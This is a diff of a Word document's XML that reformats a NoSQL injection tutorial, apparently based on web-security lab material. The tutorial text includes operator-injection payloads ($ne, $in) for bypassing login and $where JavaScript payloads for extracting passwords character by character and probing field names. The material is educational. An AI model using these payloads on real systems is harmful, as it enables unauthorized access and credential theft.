+          <w:kern w:val="0"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:bdr w:val="single" w:sz="6" w:space="4" w:color="EAEAEA" w:frame="1"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> == 1</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2592,7 +2959,33 @@
           <w:lang w:eastAsia="en-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>{"username":{"$ne":"invalid"}}</w:t>
+        <w:t>{"username</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>":{</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>"$ne":"invalid"}}</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2662,7 +3055,33 @@
           <w:lang w:eastAsia="en-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>username[$ne]=invalid</w:t>
+        <w:t>username[$</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>ne]=</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>invalid</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2821,8 +3240,23 @@
           <w:lang w:eastAsia="en-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>application/json</w:t>
-      </w:r>
+        <w:t>application/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>json</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
@@ -2913,7 +3347,12 @@
           <w14:ligatures w14:val="none"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F7F9FD"/>
+        <w:spacing w:after="150" w:line="420" w:lineRule="atLeast"/>
+        <w:outlineLvl w:val="3"/>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
           <w:b/>
@@ -2925,6 +3364,56 @@
           <w:lang w:eastAsia="en-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F7F9FD"/>
+        <w:spacing w:after="150" w:line="420" w:lineRule="atLeast"/>
+        <w:outlineLvl w:val="3"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F7F9FD"/>
+        <w:spacing w:after="150" w:line="420" w:lineRule="atLeast"/>
+        <w:outlineLvl w:val="3"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>Note</w:t>
       </w:r>
     </w:p>
@@ -2952,7 +3441,6 @@
           <w:lang w:eastAsia="en-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>You can use the </w:t>
       </w:r>
       <w:r>
@@ -3105,7 +3593,35 @@
           <w:lang w:eastAsia="en-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>{"username":"wiener","password":"peter"}</w:t>
+        <w:t>{"</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:bdr w:val="single" w:sz="6" w:space="4" w:color="EAEAEA" w:frame="1"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>username":"wiener","password":"peter</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:bdr w:val="single" w:sz="6" w:space="4" w:color="EAEAEA" w:frame="1"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>"}</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3155,7 +3671,63 @@
           <w:lang w:eastAsia="en-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>{"username":{"$ne":"invalid"},"password":{"peter"}}</w:t>
+        <w:t>{"username</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:bdr w:val="single" w:sz="6" w:space="4" w:color="EAEAEA" w:frame="1"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>":{</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:bdr w:val="single" w:sz="6" w:space="4" w:color="EAEAEA" w:frame="1"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>"$</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:bdr w:val="single" w:sz="6" w:space="4" w:color="EAEAEA" w:frame="1"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>ne":"invalid</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:bdr w:val="single" w:sz="6" w:space="4" w:color="EAEAEA" w:frame="1"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>"},"password":{"peter"}}</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3275,7 +3847,91 @@
           <w:lang w:eastAsia="en-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>{"username":{"$ne":"invalid"},"password":{"$ne":"invalid"}}</w:t>
+        <w:t>{"username</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:bdr w:val="single" w:sz="6" w:space="4" w:color="EAEAEA" w:frame="1"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>":{</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:bdr w:val="single" w:sz="6" w:space="4" w:color="EAEAEA" w:frame="1"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>"$</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:bdr w:val="single" w:sz="6" w:space="4" w:color="EAEAEA" w:frame="1"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>ne":"invalid</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:bdr w:val="single" w:sz="6" w:space="4" w:color="EAEAEA" w:frame="1"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>"},"password":{"$</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:bdr w:val="single" w:sz="6" w:space="4" w:color="EAEAEA" w:frame="1"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>ne":"invalid</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:bdr w:val="single" w:sz="6" w:space="4" w:color="EAEAEA" w:frame="1"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>"}}</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3372,7 +4028,35 @@
           <w:lang w:eastAsia="en-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>{"username":{"$in":["admin","administrator","superadmin"]},"password":{"$ne":""}}</w:t>
+        <w:t>{"username</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:bdr w:val="single" w:sz="6" w:space="4" w:color="EAEAEA" w:frame="1"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>":{</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:bdr w:val="single" w:sz="6" w:space="4" w:color="EAEAEA" w:frame="1"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>"$in":["admin","administrator","superadmin"]},"password":{"$ne":""}}</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3439,7 +4123,6 @@
           <w:lang w:eastAsia="en-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>Exploiting syntax injection to extract data</w:t>
       </w:r>
     </w:p>
@@ -3489,6 +4172,8 @@
         </w:rPr>
         <w:t> operator and </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
@@ -3499,7 +4184,33 @@
           <w:lang w:eastAsia="en-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>mapReduce()</w:t>
+        <w:t>mapReduce</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>)</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3615,6 +4326,7 @@
         </w:rPr>
         <w:t>This results in the following NoSQL query of the </w:t>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
@@ -3627,6 +4339,7 @@
         </w:rPr>
         <w:t>users</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
@@ -3662,7 +4375,37 @@
           <w:lang w:eastAsia="en-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>{"$where":"this.username == 'admin'"}</w:t>
+        <w:t>{"$where":"</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:bdr w:val="single" w:sz="6" w:space="4" w:color="EAEAEA" w:frame="1"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>this.username</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:bdr w:val="single" w:sz="6" w:space="4" w:color="EAEAEA" w:frame="1"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> == 'admin'"}</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3735,7 +4478,37 @@
           <w:lang w:eastAsia="en-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>admin' &amp;&amp; this.password[0] == 'a' || 'a'=='b</w:t>
+        <w:t xml:space="preserve">admin' &amp;&amp; </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:bdr w:val="single" w:sz="6" w:space="4" w:color="EAEAEA" w:frame="1"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>this.password</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:bdr w:val="single" w:sz="6" w:space="4" w:color="EAEAEA" w:frame="1"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>[0] == 'a' || 'a'=='b</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3785,6 +4558,7 @@
         </w:rPr>
         <w:t>You could also use the JavaScript </w:t>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
@@ -3795,7 +4569,20 @@
           <w:lang w:eastAsia="en-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>match()</w:t>
+        <w:t>match(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>)</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3832,7 +4619,50 @@
           <w:lang w:eastAsia="en-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>admin' &amp;&amp; this.password.match(/\d/) || 'a'=='b</w:t>
+        <w:t xml:space="preserve">admin' &amp;&amp; </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:bdr w:val="single" w:sz="6" w:space="4" w:color="EAEAEA" w:frame="1"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>this.password</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:bdr w:val="single" w:sz="6" w:space="4" w:color="EAEAEA" w:frame="1"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>.match</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:bdr w:val="single" w:sz="6" w:space="4" w:color="EAEAEA" w:frame="1"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>(/\d/) || 'a'=='b</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3880,7 +4710,6 @@
           <w:lang w:eastAsia="en-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>Identifying field names</w:t>
       </w:r>
     </w:p>
@@ -4051,7 +4880,65 @@
           <w:lang w:eastAsia="en-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>admin' &amp;&amp; this.username!=' admin' &amp;&amp; this.foo!='</w:t>
+        <w:t xml:space="preserve">admin' &amp;&amp; </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:bdr w:val="single" w:sz="6" w:space="4" w:color="EAEAEA" w:frame="1"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>this.username</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:bdr w:val="single" w:sz="6" w:space="4" w:color="EAEAEA" w:frame="1"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">!=' admin' &amp;&amp; </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:bdr w:val="single" w:sz="6" w:space="4" w:color="EAEAEA" w:frame="1"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>this.foo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:bdr w:val="single" w:sz="6" w:space="4" w:color="EAEAEA" w:frame="1"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>!='</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4292,7 +5179,31 @@
           <w14:ligatures w14:val="none"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t>yourself. You can then use boolean conditions to determine whether the application executes any JavaScript that you inject via this operator.</w:t>
+        <w:t xml:space="preserve">yourself. You can then use </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>boolean</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> conditions to determine whether the application executes any JavaScript that you inject via this operator.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4394,7 +5305,35 @@
           <w:lang w:eastAsia="en-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>{"username":"wiener","password":"peter"}</w:t>
+        <w:t>{"</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:bdr w:val="single" w:sz="6" w:space="4" w:color="EAEAEA" w:frame="1"/>
